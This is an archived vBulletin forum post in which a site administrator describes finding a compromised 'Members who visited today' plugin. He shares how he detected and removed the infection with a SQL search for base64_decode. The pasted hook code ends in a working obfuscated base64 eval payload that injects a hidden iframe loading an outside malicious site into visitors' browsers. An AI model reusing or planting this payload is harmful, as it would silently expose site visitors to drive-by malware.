Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 General Discussions
Reload this Page new 0 day exploit? (bekebu.in / cuzelu.in)
FAQ Community Calendar Today's Posts Search

 
 
Thread Tools Display Modes
Prev Previous Post   Next Post Next
  #12  
Old 06-28-2010, 02:32 AM
caliman's Avatar
caliman caliman is offline
 
Join Date: Jan 2005
Location: California
Posts: 256
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default
I would like to thank someDude-GP for posting that code. I have been dealing with this issue for a week on my site. You may have just helped me find this code.

I had deleted my tapatalk directory so I didn't have a possible roadmap to where they placed that code.

Searching my datastore table just now it appears that they inserted it in one of my plugins.

This is as far as I have gotten, but I am very encouraged to find a match to the code you posted.
THANK YOU. I owe you some beers.

caliman

--------------- Added [DATE]1277699440[/DATE] at [TIME]1277699440[/TIME] ---------------

In my case it was the 'Members who visted today' plugin that got infected.

The global_start hook:

Code:
if ($show['wvt'])
{
	if ($vbulletin->options['wvt24'])
	{
		$cutoff = TIMENOW - 86400;
		$whodesc = $vbphrase['wvt_visited_today_24'];
	}
	else
	{
		$whodesc = $vbphrase['wvt_visited_today'];
		$tnow = date('YmdHis',TIMENOW - intval($vbulletin->options['hourdiff'])); 
		$cutoff = TIMENOW - (substr($tnow,8,2)*3600 + substr($tnow,10,2)*60 + substr($tnow,12,2)); 
	}

	unset ($whotoday);
	$show['loggedinusers'] = true;

	if ($vbulletin->options['wvtnames']) 
	{
		$todaysusers = $vbulletin->db->query_read_slave("
			SELECT * FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
			WHERE lastactivity > $cutoff ORDER BY username
		"); 
		
		$totaltoday = 0;
		while ($today = $vbulletin->db->fetch_array($todaysusers))
		{
			$totaltoday += 1;
			$today['markinv'] = '';
			$today[visible] = true ;
			if ($today['options'] & $vbulletin->bf_misc_useroptions['invisible']) 
			{
				$today['visible'] = false ;
				if (($vbulletin->userinfo['permissions']['genericpermissions'] 
				& $vbulletin->bf_ugp_genericpermissions['canseehidden']) 
				OR $today['userid'] == $vbulletin->userinfo['userid'])
				{
					$today['markinv'] = '*';
					$today['visible'] = true ;
				}
			}
			if ($today['visible']) 
			{
				$ugroup = ($today['displaygroupid'] > 0 ? $today['displaygroupid'] : $today['usergroupid']);
				$today['opentag'] = $vbulletin->usergroupcache[$ugroup]['opentag'];
				$today['closetag'] = $vbulletin->usergroupcache[$ugroup]['closetag'];
				$today['wrdate'] = vbdate($vbulletin->options['timeformat'], $today['lastactivity']);
				eval('$whotoday .= "' . fetch_template('Display_Visitors_User') . '" . ", ";');
			}
		}

		if ($whotoday)
		{
			$whotoday = substr($whotoday, 0, -2);
		}
		else
		{
			$whotoday = $vbphrase['wvt_no_visitors'];
		}
	}
	else 
	{
		$todaysusers = $vbulletin->db->query_first_slave("
			SELECT COUNT(lastactivity) AS whotoday 
			FROM ".TABLE_PREFIX."user FORCE INDEX (lastactivity)
			WHERE lastactivity > $cutoff
		"); 
		
		$totaltoday = $todaysusers['whotoday'];
		$whotoday = $vbphrase['wvt_no_visitors_display'];
	}

	if ($vbulletin->options['wvtcol'])
	{
		$vbcollapse['collapseimg_forumhome_todayusers'] = '_collapsed';
		$vbcollapse['collapseobj_forumhome_todayusers'] = 'display:none;';
	}

	$ftotaltoday = vb_number_format($totaltoday);
	$whotitle = construct_phrase($whodesc,$ftotaltoday);

	$pid = 'paulm_wvt_37';
	if ($pemdata37['set'] == true)
	{
		$data_wvt =& $pemdata37[$pid];
	}
	else
	{
		if ($pemdata37 = unserialize($vbulletin->options['pemdata37']))
		{
			$pemdata37['set'] = true;
			$data_wvt =& $pemdata37[$pid];
		}
		else
		{
			$data_wvt = array('version' => 'N/A');
		}
 	}

	if ($vbulletin->options['enable_wvt'])
	{
		$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"] = str_replace($vbulletin->options['text_wvt'],
		$vbulletin->options['text_wvt'].$vbulletin->templatecache['Display_Visitors'],$vbulletin->templatecache["{$vbulletin->options['template_wvt']}"]);
	}

	if ($vbulletin->options['wvtmost'])
	{ 
		if (empty($vbulletin->maxloggedin))
		{
			if (method_exists($vbulletin->datastore,'do_fetch'))
			{ // Datastore extension exists, use it
				$vbulletin->datastore->do_fetch('maxloggedin',$errors);
				if ($errors[0])
				{ // Fetch failed, use original datastore
					$vbulletin->datastore->do_db_fetch("'maxloggedin'");
				}
			}
			else
			{ // No extension, use original datastore
				$vbulletin->datastore->do_db_fetch("'maxloggedin'");
			}
		}

		if ($totaltoday > intval($vbulletin->maxloggedin['maxvisitors']))
		{
			$vbulletin->maxloggedin['maxvisitorsdate'] = TIMENOW;
			$vbulletin->maxloggedin['maxvisitors'] = $totaltoday;
			build_datastore('maxloggedin', serialize($vbulletin->maxloggedin),1);

		}

		if ($vbulletin->options['wvtmost'])
		{
			if ($vbulletin->options['wvt24'])
			{
				$description = $vbphrase['wvt_members_24'];
			}
			else
			{
				$description = $vbphrase['wvt_members_day'];
			}

			$visitors = construct_phrase( 
					$description, vb_number_format($vbulletin->maxloggedin['maxvisitors']),
					vbdate( $vbulletin->options['dateformat'], $vbulletin->maxloggedin['maxvisitorsdate'], true ),
					vbdate( $vbulletin->options['timeformat'], $vbulletin->maxloggedin['maxvisitorsdate'] ) 
			);

			$whotoday = $visitors . "<br />" . $whotoday;
		}
	}
}
@eval(base64_decode("aWYgKCFpc3NldCgkX0NPT0tJRVsneGxvdiddKSkgew0KJHhiID0gYXJyYXkoJ01TSUUnLCdNeUlF
JywnSUUnLCdGaXJlZm94JywnT3BlcmEnLCdOZXRzY2FwZScsJ0Nocm9tZScsJ1NhZmFyaScsJ01l
ZGlhIENlbnRlcicpOw0KJGlmcmFuZCA9IG10X3JhbmQoMCwxMTEpOw0KJGRvbWIgPSAiaHR0cDov
L3d3dy5nZXR0aWFvLmNvLmNjL3BsLnBocCI7DQpmb3JlYWNoICgkeGIgYXMgJHhiYikgew0KaWYo
c3Ryc3RyKHN0cnRvbG93ZXIoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddKSxzdHJ0b2xvd2Vy
KCR4YmIpKSkgew0KJGRldmIgPSA8PDxISkoNCjxzY3JpcHQ+DQpmdW5jdGlvbiBTZXRDb29raWUo
Y29va2llTmFtZSxjb29raWVDb250ZW50KXsNCiB2YXIgY29va2llUGF0aCA9ICcvJzsNCiB2YXIg
ZXhwRGF0ZT1uZXcgRGF0ZSgpOw0KIGV4cERhdGUuc2V0VGltZShleHBEYXRlLmdldFRpbWUoKSsz
NzI4MDAwMDApICA7DQogdmFyIGV4cGlyZXM9ZXhwRGF0ZS50b0dNVFN0cmluZygpOw0KIGRvY3Vt
ZW50LmNvb2tpZT1jb29raWVOYW1lKyI9Iitlc2NhcGUoY29va2llQ29udGVudCkrIjtwYXRoPSIr
ZXNjYXBlKGNvb2tpZVBhdGgpKyI7ZXhwaXJlcz0iK2V4cGlyZXM7IA0KfQ0KU2V0Q29va2llKCJ4
bG92IiwgImRheSIpOw0KPC9zY3JpcHQ+DQo8aWZyYW1lIG5hbWU9IiRpZnJhbmQiIHdpZHRoPSIx
IiBoZWlnaHQ9IjEiIHNjcm9sbGluZz0ibm8iIGZyYW1lYm9yZGVyPSJubyIgbWFyZ2lud2lkdGg9
IjAiIG1hcmdpbmhlaWdodD0iMCIgc3JjPSIkZG9tYiI+PC9pZnJhbWU+DQpISko7DQpicmVhazsN
CiB9DQogfQ0KfQ=="));

Uninstalling the plugin did the trick. This also rebuilds the datastore.

You can search your database to look for this code by doing this:
Code:
SELECT * FROM plugin WHERE phpcode LIKE "%base64_decode%";
This should give you a result with the code and you can figure out which plugin it is in. You can verify through plugin manager. Then uninstall that plugin. That will remove this exploit and rebuild datastore. Reinstall plugin if you want after that.

Hope this helps someone. This has been absolutely brutal.

caliman
Reply With Quote
 

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump


All times are GMT. The time now is 10:32 PM.

Contact Us - Archive - Top

Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.07285 seconds
  • Memory Usage 2,711KB
  • Queries Executed 13 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (4)bbcode_code
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (15)post_thanks_box
  • (15)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (15)post_thanks_postbit_info
  • (15)postbit
  • (1)postbit_attachment
  • (15)postbit_onlinestatus
  • (15)postbit_wrapper
  • (1)showthread_list
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 
Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_threadedmode.php
  • ./includes/functions_post_thanks.php 
Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_postinfo_query
  • fetch_postinfo
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids_threaded
  • showthread_threaded_construct_link
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • postbit_attachment
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete